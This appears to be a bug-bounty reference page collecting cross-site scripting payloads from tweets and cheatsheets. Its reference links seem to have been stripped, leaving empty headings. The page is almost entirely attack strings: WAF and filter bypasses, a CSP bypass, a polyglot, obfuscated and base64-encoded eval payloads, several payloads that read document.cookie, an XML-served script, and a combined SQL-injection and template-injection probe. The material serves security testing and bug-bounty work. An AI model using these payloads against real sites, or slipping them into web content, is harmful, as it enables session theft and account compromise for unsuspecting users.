Cross Site Scripting (XSS)

References for Cross Site Scripting Attacks

Blogs / Articles:

Upgrading Self XSS:

Tools / Cheatsheets:

If you Google "" you can find where others are testing and maybe reveal some priv programs. :P

Twitter Threads:


<img ="=" title="><img src=1 onerror=alert(1)>"
<<img src=x onerror='prompt(1)'<
#BugBountyTip When you are dealing with XSS, try changing the device or user-agent to Mobile; you might get it to work. In my case the homepage is different across devices, the XSS is in the username and the payload is Unicode UTF-16.
XSS vector without >, \, 'alert', parentheses, quotes and spaces <svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//

thank you 
...WAF Bypass: "><brute+onbeforescriptexecute=a=alert,a(1%26%23x29> #security #XSS #KNOXSS

onffocusofocuscfocusufocuss="prompt(1)" - useful when a WAF replaces things like 'focus' with null, leaving us with onfocus="prompt(1)"

One that should bypass some XSS filters, by 
<meter onmouseover="alert(1)"

Uppercase #XSS 
<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>

XSS bypass for a weak filter - Riyaz Walikar
<img src=x onerror="[]['constructor']['constructor']('ale'+'rt(0)')()">

var of "Function ('ale'+'rt(0)')()"

<a xml:base="javascript:alert(1)//" href="#"><circle r="100" />
//Firefox :) .- 

#XSS Tip 😎
I guess this one could solve all your HTMLi problems (regular, inline & JS block)

'"</Script><Html Onmouseover=(alert)(1) // -

This might lead to some fun XSS on status-code errors:
header("HTTP/1.0 999 <img src=x onerror=alert(1)>"); -

Sometimes it works!
#XSS #Payload


<iframe src=jaVaScrIpT:eval(atob('Y29uZmlybShkb2N1bWVudC5kb21haW4pOw=='))>

<div onmouseover="alert('XSS');">Hello :) 
^ [My favorite one - works like 80% of the time for me].
That's all for now that I'll share.
Enjoy the payloads too. ;)
<--`<img/src=` onerror=alert("Friendly-XSS")> --!>

To test XSS + SQLi + SSTI/CSTI with the same payload use:

' ==> for SQL injection

"><svg/onload=prompt(5);> ==> for XSS

{{7*7}} ==> for SSTI/CSTI

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

CSP Bypass,  script-src 'self' data:

<script ?/src="data:+,\u0061lert%281%29">/</script>

When you find input field which allows " (quotes), try this payload:
"autofocus onfocus=alert(1)// -> Doesn't work

"type%3d"text"autofocus%20onfocus%3d"alert(1)" -> Works

Finally found my first bug on 
..I am just loving it. 
Bug: XSS through file upload.

Payload: */alert(1)</script><script>/*

There is so much to learn about HTML and JS hacks from this code:


This is inspired by 
 and will execute an 'alert(1)' without using parentheses, spaces or quotes!
The Best XSS Polyglot! 🚨🚨

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e


</a><a href=>Test</a>

\"><<img onerror=alert(49609) src>

"><<img onerror=alert(49609) src>




/<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>







Without ">" (XSS)

<svg onload='alert(1)'
<svg onload="alert(1)"
<svg onload=alert(1)//
<svg onload=alert(1)+
<svg onload=alert(1)<!--


<svg onload=alert(1)%20
<svg onload=alert(1)%0A
<svg onload=alert(1)%0C
<svg onload=alert(1)%0D
<svg onload=alert(1)%09


Bug: RXSS
Payload: "'`><\x00img src=xxx:x onerror=javascript:alert(1)>

Final payload:
<svg><animate onend=a\u006cert(1) dur=1s>

The final payload:
<a class="w-100" href=javascript:alert(document.cookie) // target=_self target="_blank">

Payload - \">'>\"><img/src/onerror=confirm(document.cookie)>

❌ "'><H1 on*>1
✅ "'><H1>1

My final payload was:


<input/onfocus=prompt(document.domain) autofocus>

Some payloads that worked for me in popping up a stored XSS:-

1. <img src=`xx:xx`onerror=alert(1)>
2. <div/onmouseover='alert(1)'> style="x:">
3. \";alert('XSS');//
4. "autofocus/onfocus=alert(1)//
5. '-alert(1)-'

“><<img onerror=alert(document.cookie) src>

  • Did you know <a ping="url1 url2 url3 ..."> is a thing? 😱

You can serve an XSS payload from an XML file:

xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="">
<html:script>prompt(document.domain);</html:script>
</html>

